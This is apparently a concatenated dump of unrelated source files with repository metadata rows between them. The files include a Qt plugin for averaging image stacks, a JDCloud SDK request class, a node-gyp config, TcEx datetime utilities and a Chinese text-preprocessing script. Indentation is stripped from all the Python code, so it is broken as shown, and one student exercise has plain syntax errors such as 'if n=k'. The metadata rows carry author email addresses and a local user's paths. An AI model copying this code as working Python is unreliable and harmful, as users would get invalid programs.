if not input_paths:
if not self.selected_videos:
return
else:
selected_videos = self.selected_videos
else:
selected_videos = input_paths
progress_global = QProgressDialog('Creating evoked average...', 'Abort', 0, 100, self)
progress_global.setAutoClose(True)
progress_global.setMinimumDuration(0)
def global_callback(x):
progress_global.setValue(x * 100)
QApplication.processEvents()
filenames = selected_videos
if len(filenames) < 2:
qtutil.warning('Select multiple files to average.')
return
stacks = [np.load(f, mmap_mode='r') for f in filenames]
lens = [len(stacks[x]) for x in range(len(stacks))]
min_lens = np.min(lens)
breadth = stacks[0].shape[1]
length = stacks[0].shape[2]
trig_avg = np.empty((min_lens, length, breadth), np.load(filenames[0], mmap_mode='r').dtype)
for frame_index in range(min_lens):
global_callback(frame_index / min_lens)
frames_to_avg = [stacks[stack_index][frame_index]
for stack_index in range(len(stacks))]
frames_to_avg = np.array(frames_to_avg, dtype=np.float32)
avg = np.mean(frames_to_avg, axis=0, dtype=np.float32)
trig_avg[frame_index] = avg
global_callback(1)
manip = self.Defaults.manip + '_' + str(len(filenames))
output_path = pfs.save_project(filenames[0], self.project, trig_avg, manip, 'video')
pfs.refresh_list(self.project, self.video_list,
self.params[self.Labels.video_list_indices_label],
self.Defaults.list_display_type,
self.params[self.Labels.last_manips_to_display_label])
return output_path
# self.update_tables()
def setup_whats_this(self):
super().setup_whats_this()
self.avg_button.setWhatsThis("Generate evoked average for selected image stacks where each frame is averaged "
"across image stacks for each frame")
class MyPlugin(PluginDefault):
def __init__(self, project, plugin_position):
self.name = 'Evoked Average'
self.widget = Widget(project, plugin_position)
super().__init__(self.widget, self.widget.Labels, self.name)
def check_ready_for_automation(self, expected_input_number):
self.summed_filesize = 0
for path in self.widget.selected_videos:
self.summed_filesize = self.summed_filesize + os.path.getsize(path)
self.available = list(psutil.virtual_memory())[1]
if self.summed_filesize > self.available:
return False
return True
def automation_error_message(self):
return "Not enough memory. All files to be averaged together are of size ~"+str(self.summed_filesize) +\
" and available memory is: " + str(self.available)
| [
"dirk.haupt@gmail.com"
] | dirk.haupt@gmail.com |
9fa71db652f5ba9a7efaf6487c314e53826c6153 | 187a6558f3c7cb6234164677a2bda2e73c26eaaf | /jdcloud_sdk/services/tidb/apis/DescribeAvailableDBInfoInternelRequest.py | e771d081b365e9d329da6981125f9fced96c4cf4 | [
"Apache-2.0"
] | permissive | jdcloud-api/jdcloud-sdk-python | 4d2db584acc2620b7a866af82d21658cdd7cc227 | 3d1c50ed9117304d3b77a21babe899f939ae91cd | refs/heads/master | 2023-09-04T02:51:08.335168 | 2023-08-30T12:00:25 | 2023-08-30T12:00:25 | 126,276,169 | 18 | 36 | Apache-2.0 | 2023-09-07T06:54:49 | 2018-03-22T03:47:02 | Python | UTF-8 | Python | false | false | 1,479 | py | # coding=utf8
# Copyright 2018 JDCLOUD.COM
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# NOTE: This class is auto generated by the jdcloud code generator program.
from jdcloud_sdk.core.jdcloudrequest import JDCloudRequest
class DescribeAvailableDBInfoInternelRequest(JDCloudRequest):
"""
查询 TiDB支持的基本信息。
"""
def __init__(self, parameters, header=None, version="v1"):
super(DescribeAvailableDBInfoInternelRequest, self).__init__(
'/regions/{regionId}/instances:describeAvailableDBInfoInternel', 'GET', header, version)
self.parameters = parameters
class DescribeAvailableDBInfoInternelParameters(object):
def __init__(self,regionId, ):
"""
:param regionId: 地域代码
"""
self.regionId = regionId
self.azs = None
def setAzs(self, azs):
"""
:param azs: (Optional) 用户可用区[多个使用,分隔]
"""
self.azs = azs
| [
"jdcloud-api@jd.com"
] | jdcloud-api@jd.com |
47d31b4ad6d9d3f9ec16487c975797465de7096d | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/22/usersdata/112/11794/submittedfiles/av1_2.py | 5ecfae8a8c59536c3785bab3a905bd43d390601a | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 317 | py | # -*- coding: utf-8 -*-
from __future__ import division
import math
ant=0
prox=0
meio=B
n=input('Digite o valor de n:')
j=input('Digite o valor de j:')
k=input('Digite o valor de k:')
l=input('Digite o valor de l:')
if n=k and j!=l:
print('verdadeira')
if j=l and n!=k:
print('verdadeira')
else:
('falsa') | [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
c37ed597fb842119267de7b488c688f3712ddb3e | 82ebbf9effde97aacfce1521f892c9db6b687678 | /no171_ExcelSheetcolumnNumber.py | 97c0b29d0f960d474361710bb5c6f6b9d47f1adf | [] | no_license | echocho/Leetcode | 970fee27c7e3208506d9be436f855197b7fbd7a1 | 143707c6ec3bba8b5292263f050cc2e9dd71782c | refs/heads/master | 2020-03-20T15:14:08.102392 | 2019-11-03T13:33:55 | 2019-11-03T13:33:55 | 137,507,580 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 407 | py | class Solution:
def titleToNumber(self, s):
"""
:type s: str
:rtype: int
"""
if not s:
return 0
if len(s) == 1:
return ord(s) - 64
res = 0
to_process = list(zip([chrt for chrt in s], [i for i in range(len(s) - 1, -1, -1)]))
for i, j in to_process:
res += (ord(i) - 64) * 26**j
return res | [
"echo333cheng@gmail.com"
] | echo333cheng@gmail.com |
5f92a68942366f13168520456b595bc485f6b9d7 | 24c51e4b245bbed66b43a8409dc675f3d65c70fa | /node_modules/fsevents/build/config.gypi | 27fc5aa84b5bc5c50055bf5e08367ababecd3da5 | [
"MIT"
] | permissive | kristofermc/thirdapp | 6bd0d1be7ea1769f2f691c952a17105740536bbd | 9a6823f044a6dfd7e304a260e0cab4a4874affb5 | refs/heads/master | 2022-12-23T14:51:40.635042 | 2020-10-02T15:55:10 | 2020-10-02T15:55:10 | 300,654,313 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,658 | gypi | # Do not edit. File was generated by node-gyp's "configure" step
{
"target_defaults": {
"cflags": [],
"default_configuration": "Release",
"defines": [],
"include_dirs": [],
"libraries": []
},
"variables": {
"asan": 0,
"build_v8_with_gn": "false",
"coverage": "false",
"dcheck_always_on": 0,
"debug_nghttp2": "false",
"debug_node": "false",
"enable_lto": "false",
"enable_pgo_generate": "false",
"enable_pgo_use": "false",
"force_dynamic_crt": 0,
"host_arch": "x64",
"icu_data_in": "../../deps/icu-small/source/data/in/icudt67l.dat",
"icu_default_data": "",
"icu_endianness": "l",
"icu_gyp_path": "tools/icu/icu-generic.gyp",
"icu_locales": "en,root",
"icu_path": "deps/icu-small",
"icu_small": "true",
"icu_ver_major": "67",
"is_debug": 0,
"llvm_version": "11.0",
"napi_build_version": "6",
"node_byteorder": "little",
"node_debug_lib": "false",
"node_enable_d8": "false",
"node_install_npm": "true",
"node_module_version": 72,
"node_no_browser_globals": "false",
"node_prefix": "/usr/local",
"node_release_urlbase": "https://nodejs.org/download/release/",
"node_shared": "false",
"node_shared_brotli": "false",
"node_shared_cares": "false",
"node_shared_http_parser": "false",
"node_shared_libuv": "false",
"node_shared_nghttp2": "false",
"node_shared_openssl": "false",
"node_shared_zlib": "false",
"node_tag": "",
"node_target_type": "executable",
"node_use_bundled_v8": "true",
"node_use_dtrace": "true",
"node_use_etw": "false",
"node_use_node_code_cache": "true",
"node_use_node_snapshot": "true",
"node_use_openssl": "true",
"node_use_v8_platform": "true",
"node_with_ltcg": "false",
"node_without_node_options": "false",
"openssl_fips": "",
"openssl_is_fips": "false",
"shlib_suffix": "72.dylib",
"target_arch": "x64",
"v8_enable_gdbjit": 0,
"v8_enable_i18n_support": 1,
"v8_enable_inspector": 1,
"v8_enable_lite_mode": 0,
"v8_no_strict_aliasing": 1,
"v8_optimized_debug": 1,
"v8_promise_internal_field_count": 1,
"v8_random_seed": 0,
"v8_trace_maps": 0,
"v8_use_siphash": 1,
"v8_use_snapshot": 1,
"want_separate_host_toolset": 0,
"xcode_version": "11.0",
"nodedir": "/Users/kristofer/Library/Caches/node-gyp/12.18.3",
"standalone_static_library": 1,
"dry_run": "",
"legacy_bundling": "",
"save_dev": "",
"browser": "",
"commit_hooks": "true",
"only": "",
"viewer": "man",
"also": "",
"rollback": "true",
"sign_git_commit": "",
"audit": "true",
"usage": "",
"globalignorefile": "/usr/local/etc/npmignore",
"init_author_url": "",
"maxsockets": "50",
"shell": "/bin/bash",
"metrics_registry": "https://registry.npmjs.org/",
"parseable": "",
"shrinkwrap": "true",
"init_license": "ISC",
"timing": "",
"if_present": "",
"cache_max": "Infinity",
"init_author_email": "",
"sign_git_tag": "",
"cert": "",
"git_tag_version": "true",
"local_address": "",
"long": "",
"preid": "",
"fetch_retries": "2",
"registry": "https://registry.npmjs.org/",
"key": "",
"message": "%s",
"versions": "",
"globalconfig": "/usr/local/etc/npmrc",
"always_auth": "",
"logs_max": "10",
"prefer_online": "",
"cache_lock_retries": "10",
"global_style": "",
"update_notifier": "true",
"audit_level": "low",
"heading": "npm",
"fetch_retry_mintimeout": "10000",
"offline": "",
"read_only": "",
"searchlimit": "20",
"access": "",
"json": "",
"allow_same_version": "",
"description": "true",
"engine_strict": "",
"https_proxy": "",
"init_module": "/Users/kristofer/.npm-init.js",
"userconfig": "/Users/kristofer/.npmrc",
"cidr": "",
"node_version": "12.18.3",
"user": "",
"save": "true",
"auth_type": "legacy",
"editor": "vi",
"ignore_prepublish": "",
"script_shell": "",
"tag": "latest",
"before": "",
"global": "",
"progress": "true",
"ham_it_up": "",
"optional": "true",
"searchstaleness": "900",
"bin_links": "true",
"force": "",
"save_prod": "",
"searchopts": "",
"depth": "Infinity",
"node_gyp": "/usr/local/lib/node_modules/npm/node_modules/node-gyp/bin/node-gyp.js",
"rebuild_bundle": "true",
"sso_poll_frequency": "500",
"unicode": "true",
"fetch_retry_maxtimeout": "60000",
"ca": "",
"save_prefix": "^",
"scripts_prepend_node_path": "warn-only",
"sso_type": "oauth",
"strict_ssl": "true",
"tag_version_prefix": "v",
"save_exact": "true",
"dev": "",
"fetch_retry_factor": "10",
"group": "20",
"cache_lock_stale": "60000",
"prefer_offline": "",
"version": "",
"cache_min": "10",
"otp": "",
"cache": "/Users/kristofer/.npm",
"searchexclude": "",
"color": "true",
"package_lock": "true",
"fund": "true",
"package_lock_only": "",
"save_optional": "",
"user_agent": "npm/6.14.8 node/v12.18.3 darwin x64",
"ignore_scripts": "",
"cache_lock_wait": "10000",
"production": "",
"save_bundle": "",
"send_metrics": "",
"init_version": "1.0.0",
"node_options": "",
"umask": "0022",
"scope": "",
"git": "git",
"init_author_name": "",
"onload_script": "",
"tmp": "/var/folders/ym/6mmm0kvj26l2rlpd4r796mzw0000gn/T",
"unsafe_perm": "true",
"format_package_lock": "true",
"link": "",
"prefix": "/usr/local"
}
}
| [
"kris.jussi@gmail.com"
] | kris.jussi@gmail.com |
aa374c01766824db62b8defc0771600be2b6ba24 | 8c21cba5aceb7ce80736e870be18028e1a18a611 | /connect_server_proverka.py | d3dd3f10385d886c13c98238e0d5bd029b6b3730 | [] | no_license | MadimTor/hackaton | 31babb638652409ac62c382fb899a7d515db86ba | 0aecee868734a3aa7de1a64d8dc76ec67945fdb8 | refs/heads/main | 2023-05-31T06:12:08.717508 | 2021-06-20T10:55:06 | 2021-06-20T10:55:06 | 378,538,923 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 158 | py | import socket
def connect(ip):
sock = socket.socket()
sock.connect((ip,9095))
data = sock.recv(1024).decode()
print(data)
| [
"noreply@github.com"
] | MadimTor.noreply@github.com |
9c125735232060d0d2ab96a7273d2ed807cb7f56 | 2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02 | /PyTorch/dev/cv/detection/YOLOX_ID2833_for_PyTorch/configs/mask2former/mask2former_swin-b-p4-w12-384-in21k_lsj_8x2_50e_coco-panoptic.py | 0141271ed055de4c1cb757b1cf83099916ad3b24 | [
"GPL-1.0-or-later",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | Ascend/ModelZoo-PyTorch | 4c89414b9e2582cef9926d4670108a090c839d2d | 92acc188d3a0f634de58463b6676e70df83ef808 | refs/heads/master | 2023-07-19T12:40:00.512853 | 2023-07-17T02:48:18 | 2023-07-17T02:48:18 | 483,502,469 | 23 | 6 | Apache-2.0 | 2022-10-15T09:29:12 | 2022-04-20T04:11:18 | Python | UTF-8 | Python | false | false | 941 | py |
# Copyright 2022 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) Open-MMLab. All rights reserved.
_base_ = ['./mask2former_swin-b-p4-w12-384_lsj_8x2_50e_coco-panoptic.py']
pretrained = 'https://github.com/SwinTransformer/storage/releases/download/v1.0.0/swin_base_patch4_window12_384_22k.pth' # noqa
model = dict(
backbone=dict(init_cfg=dict(type='Pretrained', checkpoint=pretrained)))
| [
"wangjiangben@huawei.com"
] | wangjiangben@huawei.com |
870d12fe6a587e970c108504b42268cb10c844f3 | 2ed2dd917afb05d194e87f989d78953b31a5781b | /lesson10/mission08.py | 718005e6a8b1523d4636183b46dc3a00179e899b | [] | no_license | RenegaDe1288/pythonProject | 4058d549db7c37652f77438c31f8b31476497d98 | 801c06f3be22ed63214987b11d6f1b3fd2fe5b44 | refs/heads/master | 2023-08-17T13:20:50.777842 | 2021-10-05T10:51:00 | 2021-10-05T10:51:00 | 393,145,207 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 498 | py | lent = int(input('Введите ширину '))
lent_2 = int(input('Введите длину '))
for row in range(lent):
for col in range(lent_2):
if col == lent_2 // 2 and row != lent//2:
print('|', end='')
elif row == lent // 2:
print('-', end='')
elif col == lent_2//2 + 5+ row:
print('\\', end='')
elif col == lent_2//2- row -5:
print('/', end='')
else:
print(' ', end='')
print()
| [
"D121188@yandex.ru"
] | D121188@yandex.ru |
22272935b9af79706810d4e840cdc228f37b064f | 65388597294f4174ad82c7ccc65d611ce278d2a8 | /tcex/tcex/utils/date_utils.py | b2b5f664775424cb7284a59a84a134e81ac42ee2 | [] | no_license | ThreatConnect-Inc/threatconnect-developer-docs | 5e13bafa14a7418d14c84f62fa0672690ebeb991 | 3c681a04cef29c5347090b687dfd4e1a28ba3efd | refs/heads/master | 2023-08-07T11:39:36.267492 | 2023-07-28T15:31:07 | 2023-07-28T15:31:07 | 78,577,108 | 8 | 19 | null | 2023-07-21T14:15:20 | 2017-01-10T21:46:46 | Python | UTF-8 | Python | false | false | 12,709 | py | """TcEx Datetime Utilities Module"""
# standard library
import calendar
import math
import re
import time
from datetime import datetime
from typing import Optional, Tuple, Union
# third-party
import parsedatetime as pdt
import pytz
from dateutil import parser
from dateutil.relativedelta import relativedelta
from tzlocal import get_localzone
class DatetimeUtils:
"""TcEx framework Datetime Utils module"""
@staticmethod
def _replace_timezone(dateutil_parser: object) -> object:
"""Replace the timezone on a datetime object.
Args:
dateutil_parser: The dateutil object.
Returns:
object: Update dateutils object.
"""
try:
# try to get the timezone from tzlocal
tzinfo = pytz.timezone(get_localzone().zone)
except pytz.exceptions.UnknownTimeZoneError: # pragma: no cover
try:
# try to get the timezone from python's time package
tzinfo = pytz.timezone(time.tzname[0])
except pytz.exceptions.UnknownTimeZoneError:
# seeing as all else has failed: use UTC as the timezone
tzinfo = pytz.timezone('UTC')
return tzinfo.localize(dateutil_parser)
def any_to_datetime(self, time_input: str, tz: Optional[str] = None) -> datetime:
"""Return datetime object from multiple formats.
Formats:
#. Human Input (e.g 30 days ago, last friday)
#. ISO 8601 (e.g. 2017-11-08T16:52:42Z)
#. Loose Date format (e.g. 2017 12 25)
#. Unix Time/Posix Time/Epoch Time (e.g. 1510686617 or 1510686617.298753)
Args:
time_input: The time input string (see formats above).
tz): The time zone for the returned data.
Returns:
(datetime.datetime): Python datetime.datetime object.
"""
# handle timestamp (e.g. 1510686617 or 1510686617.298753)
dt_value: Optional[object] = self.unix_time_to_datetime(time_input, tz)
# handle ISO or other formatted date (e.g. 2017-11-08T16:52:42Z,
# 2017-11-08T16:52:42.400306+00:00)
if dt_value is None:
dt_value: Optional[object] = self.date_to_datetime(time_input, tz)
# handle human readable relative time (e.g. 30 days ago, last friday)
if dt_value is None:
dt_value: Optional[object] = self.human_date_to_datetime(time_input, tz)
# if all attempt to convert fail raise an error
if dt_value is None:
raise RuntimeError(f'Could not format input ({time_input}) to datetime string.')
return dt_value
def chunk_date_range(
self,
start_date: Union[int, str, datetime],
end_date: Union[int, str, datetime],
chunk_size: int,
chunk_unit: Optional[str] = 'months',
date_format: Optional[str] = None,
) -> Tuple[Union[datetime, str], Union[datetime, str]]:
"""Chunk a date range based on unit and size
Args:
start_date: Date time expression or datetime object.
end_data: Date time expression or datetime object.
chunk_size: Chunk size for the provided units.
chunk_unit: A value of (years, months, days, weeks, hours, minuts, seconds)
date_format: If None datetime object will be returned. Any other value
must be a valid strftime format (%s for epoch seconds).
Returns:
Tuple[Union[datetime, str], Union[datetime, str]]: Either a datetime object
or a string representation of the date.
"""
# define relative delta settings
relative_delta_settings = {chunk_unit: +chunk_size}
# normalize inputs into datetime objects
if isinstance(start_date, (int, str)):
start_date = self.any_to_datetime(start_date, 'UTC')
if isinstance(end_date, (int, str)):
end_date = self.any_to_datetime(end_date, 'UTC')
# set sd value for iteration
sd = start_date
# set ed value the the smaller of end_date or relative date
ed = min(end_date, start_date + relativedelta(**relative_delta_settings))
while 1:
sdf = sd
edf = ed
if date_format is not None:
# format the response data to a date formatted string
sdf = self.format_datetime(sd.isoformat(), 'UTC', date_format)
edf = self.format_datetime(ed.isoformat(), 'UTC', date_format)
# yield chunked data
yield sdf, edf
# break iteration once chunked ed is gte to provided end_date
if ed >= end_date:
break
# update sd and ed values for next iteration
sd = ed
ed = min(end_date, sd + relativedelta(**relative_delta_settings))
def date_to_datetime(self, time_input: str, tz: Optional[str] = None) -> datetime:
"""Convert ISO 8601 and other date strings to datetime.datetime type.
Args:
time_input: The time input string (see formats above).
tz: The time zone for the returned data.
Returns:
(datetime.datetime): Python datetime.datetime object.
"""
dt = None
try:
# dt = parser.parse(time_input, fuzzy_with_tokens=True)[0]
dt: object = parser.parse(time_input)
# don't convert timezone if dt timezone already in the correct timezone
if tz is not None and tz != dt.tzname():
if dt.tzinfo is None:
dt = self._replace_timezone(dt)
dt = dt.astimezone(pytz.timezone(tz))
except IndexError: # pragma: no cover
pass
except TypeError: # pragma: no cover
pass
except ValueError:
pass
return dt
def format_datetime(
self, time_input: str, tz: Optional[str] = None, date_format: Optional[str] = None
) -> str:
"""Return timestamp from multiple input formats.
Formats:
#. Human Input (e.g 30 days ago, last friday)
#. ISO 8601 (e.g. 2017-11-08T16:52:42Z)
#. Loose Date format (e.g. 2017 12 25)
#. Unix Time/Posix Time/Epoch Time (e.g. 1510686617 or 1510686617.298753)
.. note:: To get a unix timestamp format use the strftime format **%s**. Python
does not natively support **%s**, however this method has support.
Args:
time_input: The time input string (see formats above).
tz: The time zone for the returned data.
date_format: The strftime format to use, ISO by default.
Returns:
(string): Formatted datetime string.
"""
# handle timestamp (e.g. 1510686617 or 1510686617.298753)
dt_value = self.any_to_datetime(time_input, tz)
# format date
if date_format == '%s':
dt_value = calendar.timegm(dt_value.timetuple())
elif date_format:
dt_value = dt_value.strftime(date_format)
else:
dt_value = dt_value.isoformat()
return dt_value
def human_date_to_datetime(
self, time_input: str, tz: Optional[str] = None, source_datetime: Optional[datetime] = None
) -> datetime:
"""Convert human readable date (e.g. 30 days ago) to datetime.datetime.
Examples:
* August 25th, 2008
* 25 Aug 2008
* Aug 25 5pm
* 5pm August 25
* next saturday
* tomorrow
* next thursday at 4pm
* at 4pm
* eod
* tomorrow eod
* eod tuesday
* eoy
* eom
* in 5 minutes
* 5 minutes from now
* 5 hours before now
* 2 hours before noon
* 2 days from tomorrow
Args:
time_input: The time input string (see formats above).
tz: The time zone for the returned datetime.
source_datetime: The reference or source datetime.
Returns:
(datetime.datetime): Python datetime.datetime object.
"""
c = pdt.Constants('en')
cal = pdt.Calendar(c, version=2)
tzinfo = None
src_tzname = None
if source_datetime is not None:
tzinfo = source_datetime.tzinfo
src_tzname = source_datetime.tzname()
try:
dt, status = cal.parseDT(time_input, sourceTime=source_datetime, tzinfo=tzinfo)
if tz is not None: # don't add tz if no tz value is passed
if dt.tzinfo is None:
dt = self._replace_timezone(dt)
# don't covert timezone if source timezone already in the correct timezone
if tz != src_tzname:
dt = dt.astimezone(pytz.timezone(tz))
if status.accuracy == 0:
dt = None
except TypeError: # pragma: no cover
dt = None
return dt
def timedelta(self, time_input1: str, time_input2: str) -> dict:
"""Calculate the time delta between two time expressions.
Args:
time_input1: The time input string (see formats above).
time_input2: The time input string (see formats above).
Returns:
(dict): Dict with delta values.
"""
time_input1: datetime = self.any_to_datetime(time_input1)
time_input2: datetime = self.any_to_datetime(time_input2)
diff = time_input1 - time_input2 # timedelta
delta: object = relativedelta(time_input1, time_input2) # relativedelta
# totals
total_months = (delta.years * 12) + delta.months
total_weeks = (delta.years * 52) + (total_months * 4) + delta.weeks
total_days = diff.days # handles leap days
total_hours = (total_days * 24) + delta.hours
total_minutes = (total_hours * 60) + delta.minutes
total_seconds = (total_minutes * 60) + delta.seconds
total_microseconds = (total_seconds * 1000) + delta.microseconds
return {
'datetime_1': time_input1.isoformat(),
'datetime_2': time_input2.isoformat(),
'years': delta.years,
'months': delta.months,
'weeks': delta.weeks,
'days': delta.days,
'hours': delta.hours,
'minutes': delta.minutes,
'seconds': delta.seconds,
'microseconds': delta.microseconds,
'total_months': total_months,
'total_weeks': total_weeks,
'total_days': total_days,
'total_hours': total_hours,
'total_minutes': total_minutes,
'total_seconds': total_seconds,
'total_microseconds': total_microseconds,
}
@staticmethod
def unix_time_to_datetime(time_input: str, tz: Optional[str] = None):
"""Convert timestamp into datetime.
Convert (unix time|epoch time|posix time) in format of 1510686617
or 1510686617.298753 to datetime.datetime type.
.. note:: This method assumes UTC for all inputs.
.. note:: This method only accepts a 9-10 character time_input.
Args:
time_input: The time input string (see formats above).
tz: The time zone for the returned datetime (e.g. UTC).
Returns:
(datetime.datetime): Python datetime.datetime object.
"""
dt = None
if re.compile(r'^[0-9]{11,16}$').findall(str(time_input)):
# handle timestamp with milliseconds and no "."
time_input_length = len(str(time_input)) - 10
dec = math.pow(10, time_input_length)
time_input = float(time_input) / dec
if re.compile(r'^[0-9]{9,10}(?:\.[0-9]{0,7})?$').findall(str(time_input)):
dt = datetime.fromtimestamp(float(time_input), tz=pytz.timezone('UTC'))
# don't covert timezone if dt timezone already in the correct timezone
if tz is not None and tz != dt.tzname():
dt = dt.astimezone(pytz.timezone(tz))
return dt
# >>> from pytz import timezone
# >>> from datetime import datetime
# >>> time_input = 1229084481
# >>> dt = datetime.fromtimestamp(float(time_input), tz=timezone('UTC'))
# >>> dt.isoformat()
# '2008-12-12T12:21:21+00:00'
# >>> tz.normalize(dt).isoformat()
# '2008-12-12T06:21:21-06:00'
# >>> dt.astimezone(timezone('US/Central'))
# datetime.datetime(2008, 12, 12, 6, 21, 21,
# tzinfo=<DstTzInfo 'US/Central' CST-1 day, 18:00:00 STD>)
# >>> dt.astimezone(timezone('US/Central')).isoformat()
# '2008-12-12T06:21:21-06:00'
| [
"rcody@threatconnect.com"
] | rcody@threatconnect.com |
d9bc6f9e1d9c1786090d4568ac2d2cb8e76395d1 | e392bac33e75c410bf704517bb1fb9b038864276 | /amazontutorial/amazontutorial/pipelines.py | 9f6de10e2b4fa82b51cc0c3fc4449a13ee6ee108 | [] | no_license | Kipkurui-mutai/Amazon-crawler | d329b53f5ed77daaee45b82e769f11a40b702f17 | 11511ceae00c26492883e7d67e066666525aeb5c | refs/heads/master | 2022-07-16T20:51:24.668769 | 2020-05-22T12:06:27 | 2020-05-22T12:06:27 | 249,800,393 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 295 | py | # -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html
class AmazontutorialPipeline(object):
def process_item(self, item, spider):
return item
| [
"hpetes69@gmail.com"
] | hpetes69@gmail.com |
473d655633f7f72afa53daced7e8c8a4a90c4f51 | a209c2238ff97d781fc6f15d9b3ae6ecf9c15b53 | /utils/preprocess.py | 6b7077e20c2ba3b9257a3940756e4f54e10dd416 | [] | no_license | Arcana-2236/Text-Classification | 1788e05e4c29ce0e7130f38cd16af5ab08fbe6fd | 69047f0ffdfc621e3cb2d59056ac93d69582090b | refs/heads/master | 2022-04-12T08:30:50.089277 | 2020-03-28T06:09:16 | 2020-03-28T06:09:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,234 | py | import os
import re
import zipfile
import pickle
import jieba
import pandas as pd
import numpy as np
from collections import Counter
from tensorflow.keras.preprocessing.text import Tokenizer
from tensorflow.keras.preprocessing.sequence import pad_sequences
from sklearn.preprocessing import MultiLabelBinarizer
from sklearn.model_selection import train_test_split
ROOT = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# input file
ZIP_DATA = os.path.join(ROOT, 'data', '百度题库.zip') # 要解压的文件
STOPWORDS = os.path.join(ROOT, 'data', 'stopwords.txt')
# output file path
# BERT
TRAIN_TSV = os.path.join(ROOT, 'data', 'train.tsv') # BERT的数据文件
DEV_TSV = os.path.join(ROOT, 'data', 'dev.tsv')
TEST_TSV = os.path.join(ROOT, 'data', 'test.tsv')
# TextCNN and Transformer
TOKENIZER_BINARIZER = os.path.join(ROOT, 'data', 'tokenizer_binarizer.pickle')
LABELS_FILE = os.path.join(ROOT, 'data', 'label.txt')
X_NPY = os.path.join(ROOT, 'data', 'x.npy') # testcnn 和 transformer的数据文件
Y_NPY = os.path.join(ROOT, 'data', 'y.npy')
def unzip_data():
"""
解压数据
"""
with zipfile.ZipFile(ZIP_DATA, 'r') as z:
z.extractall(os.path.join(ROOT, 'data'))
print("已将压缩包解压至{}".format(z.filename.rstrip('.zip')))
return z.filename.rstrip('.zip')
def combine_data(data_path):
"""
把四门科目内的所有文件合并
"""
r = re.compile(r'\[知识点:\]\n(.*)') # 用来寻找知识点的正则表达式
r1 = re.compile(r'纠错复制收藏到空间加入选题篮查看答案解析|\n|知识点:|\s|\[题目\]') # 简单清洗
data = []
for root, dirs, files in os.walk(data_path):
if files: # 如果文件夹下有csv文件
for f in files:
subject = re.findall('高中_(.{2})', root)[0]
topic = f.strip('.csv')
tmp = pd.read_csv(os.path.join(root, f)) # 打开csv文件
tmp['subject'] = subject # 主标签:科目
tmp['topic'] = topic # 副标签:科目下主题
tmp['knowledge'] = tmp['item'].apply(
lambda x: r.findall(x)[0].replace(',', ' ') if r.findall(x) else '')
tmp['item'] = tmp['item'].apply(lambda x: r1.sub('', r.sub('', x)))
data.append(tmp)
data = pd.concat(data).rename(columns={'item': 'content'}).reset_index(drop=True)
# 删掉多余的两列
data.drop(['web-scraper-order', 'web-scraper-start-url'], axis=1, inplace=True)
return data
def extract_label(df, freq=0.01):
"""
:param df: 合并后的数据集
:param freq: 要过滤的标签占样本数量的比例
:return: DataFrame
"""
knowledges = ' '.join(df['knowledge']).split() # 合并
knowledges = Counter(knowledges)
k = int(df.shape[0] * freq) # 计算对应频率知识点出现的次数
print('过滤掉出现次数少于 %d 次的标签' % k)
top_k = {i for i in knowledges if knowledges[i] > k} # 过滤掉知识点出现次数小于k的样本
df.knowledge = df.knowledge.apply(lambda x: ' '.join([label for label in x.split() if label in top_k]))
df['label'] = df[['subject', 'topic', 'knowledge']].apply(lambda x: ' '.join(x), axis=1)
return df[['label', 'content']]
def create_bert_data(df, small=False):
"""
对于 bert 的预处理
如果small=True:是因为自己的电脑太菜,就用比较小的数据量在本地实现模型
该函数给bert模型划分了3个数据集
"""
df['content'] = df['content'].apply(lambda x: x.replace(' ', ''))
if small:
print('use small dataset to test my local bert model really work')
train = df.sample(128)
dev = df.sample(64)
test = df.sample(64)
else:
train, test = train_test_split(df, test_size=0.2, random_state=2020)
train, dev = train_test_split(train, test_size=0.2, random_state=2020)
print('preprocess for bert!')
print('create 3 tsv file(train, dev, test) in %s' % (os.path.join(ROOT, 'data')))
train.to_csv(TRAIN_TSV, index=None, sep='\t')
dev.to_csv(DEV_TSV, index=None, sep='\t')
test.to_csv(TEST_TSV, index=None, sep='\t')
def load_stopwords():
return {line.strip() for line in open(STOPWORDS, encoding='UTF-8').readlines()}
def sentence_preprocess(sentence):
# 去标点
r = re.compile("[^\u4e00-\u9fa5]+|题目")
sentence = r.sub("", sentence) # 删除所有非汉字字符
# 切词
words = jieba.cut(sentence, cut_all=False)
# 去停用词
stop_words = load_stopwords()
words = [w for w in words if w not in stop_words]
return words
def df_preprocess(df):
"""
合并了去标点,切词,去停用词的操作
:param df:
:return:
"""
df.content = df.content.apply(sentence_preprocess)
return df
